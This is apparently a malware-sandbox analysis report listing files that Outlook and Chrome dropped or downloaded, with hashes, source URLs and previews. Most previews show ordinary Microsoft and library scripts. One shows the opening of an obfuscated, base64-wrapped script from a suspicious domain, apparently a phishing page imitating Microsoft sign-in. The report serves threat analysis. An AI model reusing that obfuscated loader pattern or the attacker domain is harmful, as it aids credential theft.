                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                                SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                                SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                                SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):131072
                                                                Entropy (8bit):4.701201381242015
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C57C75799E87B023A6B9210D9D3772FA
                                                                SHA1:5743BC1B2ADC67A8BD5A5E4C7CCA758193B02004
                                                                SHA-256:368A46C774ED960F6C0E5FAD7AB8BFC1BF438FB134816441CF0B00D4357D4DD0
                                                                SHA-512:8613F836993E5D215F0197337392647D7A5D644FA786D16CB3F681E3CA75A66711BED6AFCB0D26192E436832ABA3869571CD80F71925B27A9715F0EB43DB6AE7
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:(binary data; readable strings: @tzres.dll,-112 | @tzres.dll,-111 | v2_OUTLOOK:191c:66f336add84e4a05b126a32a7f4e8f66 | C:\Users\cali\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241115T1512180845-6428.etl)
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):30
                                                                Entropy (8bit):1.2389205950315936
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:53CFA05FD097456CE7D5FAF7CE8AD83C
                                                                SHA1:902A3A05FA3FBD9F83C904ACB05870E72E9BBB16
                                                                SHA-256:81F6BE4FF986B0D09569365472B22CA5F8EC301455E3B6D72471CA7F62C78F4B
                                                                SHA-512:645E7ED9B1CB2F4595ACC7EF19585B42D6C85390017F3B8E3F7D542853B0BC055A72866A684DAF006E351C82838477336052C3E2F0A24D69A8A21CECDF5A4934
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):16384
                                                                Entropy (8bit):0.6697884749581648
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D86A30DF902425F03B8BCEB9EA0F32DE
                                                                SHA1:63A85A38F963073D3198B2A7917CC0227268D9FD
                                                                SHA-256:EC59E969B08DC7F6B3A7C2CEF919A71A331D06404D846F5AFE2FA8314F62742D
                                                                SHA-512:D40CEA41B01BA780B070D845BB3177DE3EFBCCFE5082B0BB4F6385126D38F904B42CC0B9AE04920D34B33A4A145D3A889F299B1B39B86514B8328A920E812CB8
                                                                Malicious:true
                                                                Reputation:unknown
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 19:12:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2673
                                                                Entropy (8bit):3.9838745898457644
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:4A54892C3A6BC0D77B45312B0699193A
                                                                SHA1:F49CF6A56937160A2B45E6EF7E4A4B5D456683CB
                                                                SHA-256:C56026389B2584A47DCE7FE50753839266F71F547A56FEA524BE1C29DEFA0023
                                                                SHA-512:122E84E40B186FD241462828F6FF691C667A2AAE725C036676350B360FC437655DF58F5185EF6968736DE2C9977B3CE2E44F066BB903BD1EBA5DA89DC0CD5C29
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:(binary LNK data; readable strings: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe)
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 19:12:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2675
                                                                Entropy (8bit):4.000327326578854
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A07E4ADA8C1B1698A77AE1837302EA89
                                                                SHA1:B65570CEF513187667901A225890ED6472A894FA
                                                                SHA-256:2991852B7300280CA22CCBE2BFED82BC01DD173F4B5D9244E4A571D402DA8C6B
                                                                SHA-512:BBB687A39E1028E83C4B332BAA27D0EBB116E8E7F46EB164A79C81E9DD04F60A5FA3EE03FC72C5A3DC3173CE327815468D5AB75121C35CB29B712E648E77A2C1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:(binary LNK data; readable strings: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe)
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2689
                                                                Entropy (8bit):4.0064229982503266
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:816CF523C26E3E6B3859C5E4EF559305
                                                                SHA1:BD1716E80E3DE14DA111C1784638F5D51F4E6FBB
                                                                SHA-256:4A438A76C147A69F3AC40E6FACA7398D43D60CDCA226F7D10C1B6514B7D24DDE
                                                                SHA-512:9721806DA33DC468BCF58C0A9406E02E0342B9F7B82DC37EF940B2A71331CC34FA7DA3EC21A0F790F1D0A28AF218E21F7093F69D38B3F609D8D85A3A85CEAC77
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:(binary LNK data; readable strings: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe)
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 19:12:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2677
                                                                Entropy (8bit):3.995908833152216
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8D564EB2B3D90DC0DAE7CC199D39705D
                                                                SHA1:E92D1972600B801644F7BDE3A9E0AAEF367AA395
                                                                SHA-256:F6DBCF33BE54C6111A50CB8CA35F70864E23302571C52ED13F3063254F8461A5
                                                                SHA-512:0347E224FEC5085727B344FDDE638C721C3C0B866A9FABD747D60783EC363BFBD5B14E1E9DA248FA9A34F66CEE206458CCB6D0348FCAB44AFC6806FB50417BDE
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:(binary LNK data; readable strings: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe)
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 19:12:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2677
                                                                Entropy (8bit):3.9839624607127586
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:38BC9B9CABFAACA711F59652AC3DE57D
                                                                SHA1:1EBEE77D7F596A672457CC0C8AA6BF0D411D5C51
                                                                SHA-256:D7CD5ED15ADF728355F1925F64C950CD5EFDDD35AE0B7344F92D38458896A53D
                                                                SHA-512:7696061AD9E1D6193E4D093D95846A41B9C9DBFF1D56F0ABB6D3AEB35CE5FFF63DE049DC7850ED04C7B5920BB43F9B76002D90AE6E898601467E1A9DD5DF09AF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:(binary LNK data; readable strings: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe)
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 19:12:32 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2679
                                                                Entropy (8bit):3.995274545513944
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:380B6BC7C8CF95BDF9A29D11E4F715A4
                                                                SHA1:82956BCFDEE56A74FC2BD3FC8336F15D13ABD55F
                                                                SHA-256:E75CD45C088C253FE1D48B930623D90C3C1D60C6B98CC2C1769A595205FD1907
                                                                SHA-512:887F338E4B55AADAC8B480950728ACD7D13005D4C748FB68640DD8086A626AF356A1D5E78B29A6499720E1CA52F1F90D27343E8D2B36DBDA19825B5D6F9F995E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:L..................F.@.. ...$+.,......u..7..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY}.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VoY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........n.6......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:Microsoft Outlook email folder (>=2003)
                                                                Category:dropped
                                                                Size (bytes):2302976
                                                                Entropy (8bit):1.3455104413868888
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:FCB5237533859A4E2106C6FE320B217B
                                                                SHA1:ACBBC0B06BD4442EA6924E1CB590F6CF86F47B73
                                                                SHA-256:81946A7396A1C06C8F528DA0E0E948477F04269D5342975DAFB2EA097E5087F5
                                                                SHA-512:5F58DE19971BD4D5E27FB623FC3336C810AD8BA690194830D0455931DEC6800D9D55CB73DFF647BED4B5AC3F4157665A77D6C434793BBC68C43170F2A2275904
                                                                Malicious:true
                                                                Reputation:unknown
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):393216
                                                                Entropy (8bit):5.253414177367724
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A175A4FA667759E0CD1DA432DE442726
                                                                SHA1:412C03798DD0DD50BD9A67B81EB9B346026EDE55
                                                                SHA-256:0D0FC579AF48FA9EFFD896F16E2CCE1E542F4C523774B02D419C2704422F2669
                                                                SHA-512:F6323476EF7ABBBF7AEF1508CB647B49E6D54E38BED56C060158AE4AE8D05D1A3EA77771A3A23CF476AA5A8FE4C75B9917A4ED06436EDC3D002E56A4EB2BCB5B
                                                                Malicious:true
                                                                Reputation:unknown
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):48316
                                                                Entropy (8bit):5.6346993394709
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2CA03AD87885AB983541092B87ADB299
                                                                SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):3452
                                                                Entropy (8bit):5.117912766689607
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://login.live.com/Me.htm?v=3
                                                                Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (513), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):513
                                                                Entropy (8bit):5.350826451115093
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:602C381194795DFC124FACDF48492EF1
                                                                SHA1:90D594B7B5AF217824F2974514548C95FECFBFA5
                                                                SHA-256:BF450798FB52E2458A1E10749577E5334F3E1D7907A47FDFEA5430CB71FA19E6
                                                                SHA-512:8837F6BD2A11387D31A866D07B66A0FF2E58D2EDC2682A582919A1896CE9B4CB683A795D91968B41FA46C31CE62D34414E1F3318D4F5DDA2999447F4BCA6133D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://c.s-microsoft.com/en-us/CMSScripts/script.jsx?k=f65ecb70-094d-0b11-7c9d-7da1bcadfaa7
                                                                Preview:var jsllConfig={useDefaultContentName:!0,syncMuid:!0,authMethod:AUTHMETHOD,isLoggedIn:ISLOGGEDIN===undefined||ISLOGGEDIN!=="True"?!1:!0,muidDomain:MUIDDOMAIN||"microsoft.com",useShortNameForContentBlob:!1,autoCapture:{pageView:!0,onLoad:!0,onUnload:!0,click:!0,scroll:!0,resize:!0,lineage:!0,jsError:!0,addin:!0,perf:!0},coreData:{appId:JSLLAPPID,market:LOCALE,pageName:PAGENAME,pageType:PAYLOADTYPE,referrerUri:document.referrer,requestUri:window.location.href},callback:{pageName:PAGENAME}};awa.init(jsllConfig)
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                Category:dropped
                                                                Size (bytes):1435
                                                                Entropy (8bit):7.8613342322590265
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (46591)
                                                                Category:downloaded
                                                                Size (bytes):142367
                                                                Entropy (8bit):5.430597817875451
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:CCAA31FD031C4C856EB7B986FD9F447B
                                                                SHA1:0A809EABCDB95FA04DE5F8409B3BC994ED65CBD1
                                                                SHA-256:3D40B4129B8B4C284908636AE46D72EA053F286FB5FE45DB78351B5B2CFC1EB9
                                                                SHA-512:4B5B2271DB5F640FEBF13A7C0BDBD630C73530000F1593046D090585D1752E239D894614E23E801BE4C6A379406B6EF521423FA27C3865C3CD4ABB0A64823780
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://aadcdn.msftauth.net/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js
                                                                Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (5481), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):15880
                                                                Entropy (8bit):5.926995596321435
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5F4991D277F35CB0E590DC07DFD74592
                                                                SHA1:4C72292D83366BC03D6B28B2C2DF0E6FF46E4C2C
                                                                SHA-256:3E922C5DAFD37C9E0361DC9B54FAD5626507072A76B915D11D63A90553916F89
                                                                SHA-512:F6253F53D06B29ADFCE3D028849B7EF6DDA9E8CE0067D858E26C448FCD4D9B0FC8A7C3750BBAB24489D6A2D50143F437A0FC200A49265781190240D697893B3F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://mrwa.ungonditc.com/aIEqPG/
                                                                Preview: Success is not in what you have, but who you are. -->..<script>../* Persistence is the key to achieving great things. */..if(atob("aHR0cHM6Ly9NcndhLnVuZ29uZGl0Yy5jb20vYUlFcVBHLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (47671)
                                                                Category:downloaded
                                                                Size (bytes):47672
                                                                Entropy (8bit):5.401921124762015
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B804BCD42117B1BBE45326212AF85105
                                                                SHA1:7B4175AAF0B7E45E03390F50CB8ED93185017014
                                                                SHA-256:B7595C3D2E94DF7416308FA2CCF5AE8832137C76D2E9A8B02E6ED2CB2D92E2F7
                                                                SHA-512:9A4F038F9010DDCCF5E0FAF97102465EF7BA27B33F55C4B86D167C41096DB1E76C8212A5E36565F0447C4F57340A10DB07BB9AE26982DFFF92C411B5B1F1FB97
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://challenges.cloudflare.com/turnstile/v0/b/22755d9a86c9/api.js
                                                                Preview:"use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function g(u){Ht(l,o,c,g,h,"next",u)}function h(u){Ht(l,o,c,g,h,"throw",u)}g(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65447)
                                                                Category:dropped
                                                                Size (bytes):89501
                                                                Entropy (8bit):5.289893677458563
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                Category:downloaded
                                                                Size (bytes):116365
                                                                Entropy (8bit):7.997737813291819
                                                                Encrypted:true
                                                                SSDEEP:
                                                                MD5:2D3FBED6DDD719FCC1BFB500B612FCEC
                                                                SHA1:CD91B795DDE806AC8A38E51CCB6E8BAD8E57DA1B
                                                                SHA-256:B2566B646F02DF4CE30B05D8223B78130A719D4EC9E4794A0106C371ADE33CC7
                                                                SHA-512:A870E514B325D6FDC4D154438A8DD333C7AB46E545C1B27AC4869D9F1D8594CA1CDC530F5E96C835220DDAD4E1CEF841673696978031B5237E783972AEE701D1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.js
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57443
                                                                Category:dropped
                                                                Size (bytes):16326
                                                                Entropy (8bit):7.987374325584103
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C217AE35B8592DC9F1E680487DAD094F
                                                                SHA1:2E642562C2BFD8968629317FF212684C7EB59193
                                                                SHA-256:D41992E79D7BCFCC1F32597208DD99033D99C04882EAFCC8508F2FA0EE728C6B
                                                                SHA-512:EAF3BF49BCF58A7F7C39CBF35FD75862FEE98F611536080DFC794D288274CB9D67E95D0299679F7981E110B2577A47579D3623C7F11A6AC2A0CFA56AAEA2CAB0
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 449972
                                                                Category:dropped
                                                                Size (bytes):122342
                                                                Entropy (8bit):7.997532685332134
                                                                Encrypted:true
                                                                SSDEEP:
                                                                MD5:147E69329BBA6FCE4DDE9F78ED77B09C
                                                                SHA1:562AAB06119DA1887889091BD4ED50EA28BCA5B6
                                                                SHA-256:EC4EF3667A279D376892CD32D3E03852EAA04633FD1B2191E74F6312DA2C1D4A
                                                                SHA-512:CFBD3615F3581F4754E10EA4636423924187E4AD26F02EA613FED5C616A7118FE62D490CDE224E5AF4FAB5D54DC13C6DEEA82FA938F3DAA1EE0229C2D4705358
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                Category:downloaded
                                                                Size (bytes):35168
                                                                Entropy (8bit):7.99275807202193
                                                                Encrypted:true
                                                                SSDEEP:
                                                                MD5:D3B6AE9986DF244AB03412CC700335D0
                                                                SHA1:BAAA1F9899178938F3881F09B18265E47DA806E3
                                                                SHA-256:CA50059111D30C2E212C90805792EB543548AEF0D4941E886A778E3DCE0B9066
                                                                SHA-512:755C57FBC9BECE435A477F76C5E8198CA8942C23BE667ACAB83A00E5CD4F54075B10AA07C7FDC10C38FC3D5C0C406C9132FEB5B67BA5BCCC57EF796054A84E7C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 92 x 67, 8-bit/color RGB, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):61
                                                                Entropy (8bit):3.9902101553250042
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:0ED14AF36F2244A2F02C53D5EA300686
                                                                SHA1:01E2ECB913536B9325C3A8FE6AD26B954D14753C
                                                                SHA-256:69E572F8A1712ECE5B8BE0A95E10F808BCBA4AC9CA31A553A820AD948604443C
                                                                SHA-512:A31CF0251391FA320889C83408F15C2B63EA4A5B878F85CA3EF591FFB3E7F52E128AE1EBE253B3C8CE6B7A5F1F104CBC35DF1757306BF07A78A0295D6F3631E6
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8e31e5c8d84a3468/1731701564320/DHJ-Ff0u-GtLTiF
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 97 x 56, 8-bit/color RGB, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):61
                                                                Entropy (8bit):4.035372245524405
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:57C8353D95A7610C40A982ABB97F1DDC
                                                                SHA1:FFC36C413360259ACA19205D3B8531B904E22955
                                                                SHA-256:9A434FD42FF7932B35D5392ABBE946059956EEF622968BB727719279D82D857E
                                                                SHA-512:8614E6D1F8F044AC8CDACE2BD05D22EC1AB6551AE75C00AEB68272038CA9DC8DF0B8E9E84714A1480B6A9CFC18F0A37A436A112E4D844C03E3F34AF272C01FC7
